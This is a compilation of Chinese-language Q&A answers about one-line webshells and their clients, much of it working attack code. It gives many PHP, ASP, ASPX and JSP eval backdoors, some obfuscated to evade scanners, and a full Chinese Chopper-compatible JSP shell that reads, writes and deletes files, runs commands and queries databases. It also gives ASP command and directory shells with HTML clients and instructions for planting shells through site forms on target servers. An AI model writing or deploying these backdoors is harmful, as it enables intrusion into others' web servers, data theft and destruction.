php一句話木馬客戶端

1. 一句話木馬的客戶端

一句話最常用的客戶端為：
一句話客戶端增強版
中國菜刀
lanker一句話客戶端
ZV新型php一句話木馬客戶端GUI版

2. 以下哪些是常見的php 一句話木馬

建議樓主下載安裝騰訊電腦管家來進行殺毒，
重啟電腦按F8進入安全模式--打開騰訊電腦管家--殺毒--全盤掃描----頑固木馬剋星--深化掃描--完成重啟電腦就可以了
騰訊電腦管家為國內首個採用「 4+1 」核「芯」殺毒引擎的專業殺毒軟體，
應用騰訊自研第二代反病毒引擎「鷹眼」，
資源佔用少，基於CPU虛擬執行技術能夠根除頑固病毒，
大幅度提升深度查殺能力。

3. php一句話木馬怎樣放上去的

前提是你要確定網頁是否是用php寫的。
其次你要在任意表單中加寫如下語句<?php @eval($_POST[value]);?>並提交
如果對方漏洞較大你就可以對此網頁執行value中的任何命令

4. 一句話木馬

常用一句話木馬
asp一句話木馬：
<%execute(request("value"))%>
php一句話木馬：
<?php @eval($_POST[value]);?>
aspx一句話木馬：
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
其他一句話木馬：
<%eval request("value")%>
<%execute request("value")%>
<%execute(request("value"))%>
<%If Request("value")<>"" Then Execute(Request("value"))%>
<%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>
<SCRIPT language=VBScript runat="server">execute request("value")</SCRIPT>
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"],"unsafe");%>
可以躲過雷客圖的一句話木馬http://jeepy.cn/ ：
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""value""))")
%>
不用'<,>'的asp一句話木馬：
<script language=VBScript runat=server>execute request("value")</script>
不用雙引號的一句話木馬：
<%eval request(chr(35))%>
UTF-7編碼加密:
<%@ codepage=65000%><% response.Charset=」936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

5. PHP一句話木馬怎麼連接

使用一句話客戶端鏈接就可以了。。 不一定非要菜刀

6. 如何使用JSP一句話木馬和菜刀木馬

相信用過一句話木馬的黑闊們對中國菜刀這個程序不會感到陌生，小弟也曾使用PHP一句話木馬輕松lcx了很多站。近期Struts2重定向漏洞瘋狂來襲，不少黑闊們都摩拳擦掌、爭先恐後的尋找屬於自己的那群「小肉雞」。由於工作需要，我也對幾個站點做了Struts2重定向漏洞的測試，所有使用Struts2框架的網站安全問題均不容樂觀，中標率幾乎達到了85%以上。也許一場血雨腥風的Struts2漏洞利用潮即將來臨。
說了這么多廢話，本文的目的是什麼呢？其實只是想記錄一下JSP幾種後門代碼啦，因為曾經找JSP菜刀馬找的老辛苦了。
1、首先是JSP一句話木馬和它的客戶端小夥伴。（小夥伴們都驚呆了~~~）
以下是服務端，保存成one.jsp並上傳至目標伺服器中。
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
通過使用一句話木馬客戶端連接one.jsp木馬。
將下列代碼保存為html頁面：
<html><head><title>JSP一句話木馬客戶端</title></head><div align=center> <font color=red>專用JSP木馬連接器</font><br><form name=get method=post>服務端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代碼</textarea><br>保存成的文件名：<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form> <br>服務端代碼：<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> </textarea> </div></body>
保存完成後，打開html頁面，寫入一句話木馬服務端地址，例如http://www.cto365.com/one.jsp，寫入需要的代碼和保存的文件名稱點擊保存即可。

2、中國菜刀能用的菜刀馬
本文除了對jsp一句話木馬進行了說明，還提供了一個中國菜刀能用的菜刀馬。
將下列代碼保存為xx.jsp並上傳至目標伺服器，使用中國菜刀工具進行連接。
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd="cto365.com";String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}Connection GC(String s)throws Exception{String[] x=s.trim().split("rn");Class.forName(x[0].trim()).newInstance();Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/t"+sT+"t"+l[i].length()+"t"+sQ+"n");}else{sF+=l[i].getName()+"t"+sT+"t"+l[i].length()+"t"+sQ+"n";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2){os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"rn");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"t");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);while(r.next()){sb.append(r.getString("TABLE_NAME")+"t");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("rn");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")t");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"t|t");}sb.append("rn");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"t|t");}sb.append("rn");}r.close();}catch(Exception e){sb.append("Resultt|trn");try{m.executeUpdate(q);sb.append("Execute Successfully!t|trn");}catch(Exception ee){sb.append(ee.toString()+"t|trn");}}m.close();c.close();}%><%String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"rn");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());%>

7. 超高分求 asp一句話木馬~

ASP一句話木馬大全！

<%eval request("MH")%>

<%execute request("MH")%>

<%execute(request("MH"))%>

<%If Request("MH")<>"" Then Execute(Request("MH"))%>

<%if request ("MH")<>""then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>

<SCRIPT language=VBScript runat="server">execute request("MH")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["MH"],"unsafe");%>

1 asp一句話木馬
一句話木馬 伺服器端
帶驗證:
——————————————cmd.asp————————————————
<%
if request("authkey")="pic16f873a" then
%>
<textarea readonly cols=80 rows=25>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
</textarea>
<%
end if
%>

帶驗證 客戶端
——————————————cmd.html————————————————
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frm target=_blank>
Host:<input type=text name=act size=65 value="http://">
<br>
<br>
Cmd :<input type=text name=cmd size=65 value="cmd">
<br>
<br>
<input type=hidden name=authkey value="pic16f873a">
<Input name=Send
onclick="Javascipt:frm.action=document.frm.act.value;
frm.submit();"
type=button value="Send Command">
</FORM>
</div>

目錄瀏覽

伺服器端
_________________________________________
<%
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")
set shell=server.createobject("shell.application")
set dir1=shell.namespace(szPara)
set diritems=dir1.items

for each iii in diritems
response.write iii.path & "<font color=blue>[" & iii.size &"]</font><br>"
next
end if
%>
_________________________________________
客戶端
__________________________________________
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frm target=_blank>
Host:<input type=text name=act size=65 value="http://">
<br>
<br>
Path:<input type=text name=path size=65 value="C:\">
<br>
<br>
<input type=hidden name=authkey value="pic16f873a">
<Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command">

</FORM>
</div>

一句話木馬客戶端源文件：

裡面涉及到一些腳本知識，我就只講解一下功能和簡單注釋，不詳細講了，大家只要注意幾個注意點就行了
***********************************************************

<form action=http://cjy.xjife.e.cn/news/ebook/db/ebook.asp method=post>
//"action="後面是需要修改的以asp命名的資料庫的提交地址
//這個標簽的意思是建立一個表單 以post方式提交給連接http://cjy.xjife.e.cn/news/ebook/db/ebook.asp處理

<textarea name=value cols=120 rows=10 width=45>
//這里的value值根據服務端<%execute request("value")%>中value而設定
//可以自行修改成<%execute request("p")%>相應這里的value值也必須改為p

set lP=server.createObject("Adodb.Stream")//建立流對象，有了對象才可以使用它固有的屬性和方法
lP.Open //打開
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字體標准
lP.writetext request("joeving") //取得木馬內容 參數joeving可以自己定義 但必須和下面的name=joeving相對應
lP.SaveToFile server.mappath("wei.asp"),2
//將木馬內容以覆蓋文件的方式寫入wei.asp
//2就是已覆蓋的方式，這里的wei.asp也是可以自己定義的，如定義成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //關閉對象
set lP=nothing //釋放對象
response.redirect "wei.asp" //轉向生成的wei.asp 和上面的wei.asp相對應，也就是你熟悉的asp木馬登 陸界面
</textarea>
//這段程序的功能：利用插入到資料庫文件的<%execute request("value")%>這段代碼執行第一個textarea中的內容，並將添加的木馬內容寫入和指向wei.asp，這樣就相當於在伺服器上建立了個asp木馬文件，這樣就可以取得webshell了

<textarea name=joeving cols=120 rows=10 width=45>添入生成木馬的內容/textarea><BR><center><br>
//這段標簽是你用來添加木馬內容用的

<input type=submit value=提交>
</form>

***********************************************************

//程序的主要框架是
<form>
<textarea></textarea>//取得木馬內容並用無組件上傳技術在伺服器端創建asp木馬文件並顯示
<textarea></textarea>//添加木馬內容用的
</form>
其實都是些很簡單的一些html和asp的知識，大家不妨自己寫個自己的木馬客戶端~~~呵呵

8. ZV新型PHP一句話木馬客戶端GUI版怎麼用

明顯做不到, 一句話 只是木馬入侵的一個工具 找個地方把一句話寫入網站的資料庫,然後客戶端連接.就可以獲得這個網站的許可權了.

9. php一句話木馬上傳時<php被過濾了要怎麼破

現在一般性的一句話都會被攔截，各家IDC都使用了較全面的AI學習和特徵庫，你可以看這篇文章就清楚了：那些強悍的PHP一句話後門，另外推薦一個最新的：「冰蠍」動態二進制加密網站管理客戶端，WebShell工具

10. 求助php網站被一句話木馬入侵

一句話木馬一般都是插在 留言板之類的常用文本框裡面